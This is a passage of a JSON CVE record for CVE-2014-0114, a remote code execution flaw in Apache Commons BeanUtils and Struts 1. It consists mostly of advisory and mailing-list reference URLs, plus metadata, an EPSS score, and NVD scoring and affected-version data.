"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.vmware.com/security/advisories/VMSA-2014-0012.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689"
},
{
"name": "FEDORA-2014-9380",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136958.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://security.netapp.com/advisory/ntap-20140911-0001/"
},
{
"name": "59464",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59464"
},
{
"name": "59118",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59118"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://security.netapp.com/advisory/ntap-20180629-0006/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://access.redhat.com/solutions/869353"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://advisories.mageia.org/MGASA-2014-0219.html"
},
{
"name": "60703",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/60703"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"name": "[oss-security] 20140707 Re: CVE request for commons-beanutils: \u0027class\u0027 property is exposed, potentially leading to RCE",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "http://openwall.com/lists/oss-security/2014/07/08/1"
},
{
"name": "RHSA-2018:2669",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:2669"
},
{
"name": "GLSA-201607-09",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "https://security.gentoo.org/glsa/201607-09"
},
{
"name": "HPSBST03160",
"tags": [
"vendor-advisory",
"x_refsource_HP"
],
"url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2"
},
{
"name": "20141205 NEW: VMSA-2014-0012 - VMware vSphere product updates address security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
},
{
"name": "59228",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59228"
},
{
"name": "59246",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59246"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
},
{
"name": "[oss-security] 20140616 CVE request for commons-beanutils: \u0027class\u0027 property is exposed, potentially leading to RCE",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "http://openwall.com/lists/oss-security/2014/06/15/10"
},
{
"name": "59245",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59245"
},
{
"name": "HPSBMU03090",
"tags": [
"vendor-advisory",
"x_refsource_HP"
],
"url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
},
{
"name": "60177",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/60177"
},
{
"name": "20141205 NEW: VMSA-2014-0012 - VMware vSphere product updates address security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2014/Dec/23"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ibm.com/support/docview.wss?uid=swg21675496"
},
{
"name": "DSA-2940",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2014/dsa-2940"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266"
},
{
"name": "59014",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59014"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091"
},
{
"name": "67121",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/67121"
},
{
"name": "59480",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59480"
},
{
"name": "HPSBGN03041",
"tags": [
"vendor-advisory",
"x_refsource_HP"
],
"url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2"
},
{
"name": "59479",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59479"
},
{
"name": "59704",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59704"
},
{
"name": "58947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/58947"
},
{
"name": "59718",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59718"
},
{
"name": "59430",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/59430"
},
{
"name": "58851",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/58851"
},
{
"name": "[lucene-solr-user] 20190104 Re: SOLR v7 Security Issues Caused Denial of Use - Sonatype Application Composition Report",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E"
},
{
"name": "[infra-devnull] 20190329 [GitHub] [pulsar] massakam opened pull request #3938: Upgrade third party libraries with security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3Cdevnull.infra.apache.org%3E"
},
{
"name": "[pulsar-commits] 20190329 [GitHub] [pulsar] massakam opened a new pull request #3938: Upgrade third party libraries with security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3Ccommits.pulsar.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"name": "[commons-issues] 20190521 [jira] [Created] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190522 [jira] [Commented] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190522 [jira] [Work logged] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-dev] 20190522 [beanutils2] CVE-2014-0114 Pull Request",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3Cdev.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-dev] 20190525 Re: [beanutils2] CVE-2014-0114 Pull Request",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3Cdev.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-commits] 20190528 [commons-beanutils] branch master updated: BEANUTILS-520: Mitigate CVE-2014-0114 by enabling SuppressPropertiesBeanIntrospector.SUPPRESS_CLASS by default. (#7)",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3Ccommits.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190528 [jira] [Closed] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-notifications] 20190528 Build failed in Jenkins: commons-beanutils #74",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3Cnotifications.commons.apache.org%3E"
},
{
"name": "[commons-commits] 20190528 [commons-beanutils] branch master updated: [BEANUTILS-520] BeanUtils2 mitigate CVE-2014-0114.",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3Ccommits.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190528 [jira] [Work logged] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-notifications] 20190528 Build failed in Jenkins: commons-beanutils #75",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3Cnotifications.commons.apache.org%3E"
},
{
"name": "[commons-dev] 20190605 Re: [beanutils] Towards 1.10",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3Cdev.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190615 [jira] [Updated] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190615 [jira] [Reopened] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190615 [jira] [Resolved] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-dev] 20190814 [SECURITY] CVE-2019-10086. Apache Commons Beanutils does not suppresses the class property in PropertyUtilsBean by default.",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3Cdev.commons.apache.org%3E"
},
{
"name": "[commons-user] 20190814 [SECURITY] CVE-2019-10086. Apache Commons Beanutils does not suppresses the class property in PropertyUtilsBean by default.",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3Cuser.commons.apache.org%3E"
},
{
"name": "[announce] 20190814 [SECURITY] CVE-2019-10086. Apache Commons Beanutils does not suppresses the class property in PropertyUtilsBean by default.",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3Cannounce.apache.org%3E"
},
{
"name": "[commons-issues] 20190818 [jira] [Commented] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[activemq-gitbox] 20190903 [GitHub] [activemq-artemis] jeloba opened a new pull request #2820: Updated Apache BeanUtils to address CVE",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3Cgitbox.activemq.apache.org%3E"
},
{
"name": "[activemq-issues] 20190904 [jira] [Created] (ARTEMIS-2470) Update Apache BeanUtils to Address CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3Cissues.activemq.apache.org%3E"
},
{
"name": "[commons-commits] 20190906 [commons-configuration] branch master updated: [CONFIGURATION-755][CVE-2014-0114] Update Apache Commons BeanUtils from 1.9.3 to 1.9.4.",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3Ccommits.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190906 [jira] [Updated] (CONFIGURATION-755) [CVE-2014-0114] Update Apache Commons BeanUtils from 1.9.3 to 1.9.4.",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190906 [jira] [Closed] (CONFIGURATION-755) [CVE-2014-0114] Update Apache Commons BeanUtils from 1.9.3 to 1.9.4.",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[activemq-issues] 20190909 [jira] [Work logged] (ARTEMIS-2470) Update Apache BeanUtils to Address CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3Cissues.activemq.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3Cissues.commons.apache.org%3E"
},
{
"name": "RHSA-2019:2995",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2995"
},
{
"name": "[commons-issues] 20191014 [jira] [Updated] (BEANUTILS-520) Mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"name": "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"name": "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"name": "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E"
},
{
"name": "[activemq-issues] 20200109 [jira] [Resolved] (ARTEMIS-2470) Update Apache BeanUtils to Address CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3Cissues.activemq.apache.org%3E"
},
{
"name": "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E"
},
{
"name": "[lucene-solr-user] 20200320 Re: CVEs (vulnerabilities) that apply to Solr 8.4.1",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E"
},
{
"name": "[dolphinscheduler-commits] 20210121 [GitHub] [incubator-dolphinscheduler] c-f-cooper commented on issue #4506: There is a vulnerability in beanutils 1.7.0,upgrade recommended",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3Ccommits.dolphinscheduler.apache.org%3E"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2014-0114",
"datePublished": "2014-04-30T10:00:00.000Z",
"dateReserved": "2013-12-03T00:00:00.000Z",
"dateUpdated": "2024-08-06T09:05:38.989Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2014-0114",
"date": "2026-05-29",
"epss": "0.92374",
"percentile": "0.9974"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2014-0114\",\"sourceIdentifier\":\"secalert@redhat.com\",\"published\":\"2014-04-30T10:49:03.973\",\"lastModified\":\"2026-05-06T22:30:45.220\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \\\"manipulate\\\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.\"},{\"lang\":\"es\",\"value\":\"Apache Commons BeanUtils, seg\u00fan se distribuye en lib/commons-beanutils-1.8.0.jar en Apache Struts 1.x hasta la versi\u00f3n 1.3.10 y en otros productos que requieren commons-beanutils hasta la versi\u00f3n 1.9.2, no suprime la propiedad class, lo que permite a atacantes remotos \\\"manipular\\\" el ClassLoader y ejecutar c\u00f3digo arbitrario a trav\u00e9s del par\u00e1metro class, seg\u00fan lo demostrado por el paso de este par\u00e1metro al m\u00e9todo getClass del objeto ActionForm en Struts 1.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:commons_beanutils:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.9.1\",\"matchCriteriaId\":\"02FF6542-F5F7-465D-9755-E4EFC8953453\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A5051228-446E-461D-9B5F-8F765C7BA57F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EE1B8A83-43A4-4C4F-BB95-4D9CAD882D1C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A55DDFE1-A8AB-47BB-903E-957FCF3D023D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.1:b1:*:*:*:*:*:*\",\"matchCriteriaId\":\"93FA9AE3-B453-4FE6-82A9-7DDEF3F6C464\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.1:b2:*:*:*:*:*:*\",\"matchCriteriaId\":\"A3BB6FBE-469B-4920-A30B-33AD9E41ACCD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.1:b3:*:*:*:*:*:*\",\"matchCriteriaId\":\"34FC82D3-CCAF-4F37-B531-2A9CA17311A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.1:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"E0B8B413-8C62-44B6-A382-26F35F4573D4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.1:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"6309C679-890A-4214-8857-9F119CBBAA00\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.2.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CD882860-03D0-49E9-8CED-DE6663392548\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.2.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EDDD509E-9EBF-483F-9546-A1A3A1A3380E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.2.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B2ECF5E1-457F-4E76-81F7-65114DC4E1E4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.2.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2FC81E1A-2779-4FAF-866C-970752CD1828\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.2.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CBD69FAE-C1A3-4213-824A-7DCCE357EB01\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.2.9:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9C34FDB0-2778-4C36-8345-F7E27509A383\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.3.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CF0302D3-CB8D-4FA7-8F07-C2C7593877BE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.3.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"03906D34-F3B3-4C56-A6A6-2F7A10168501\"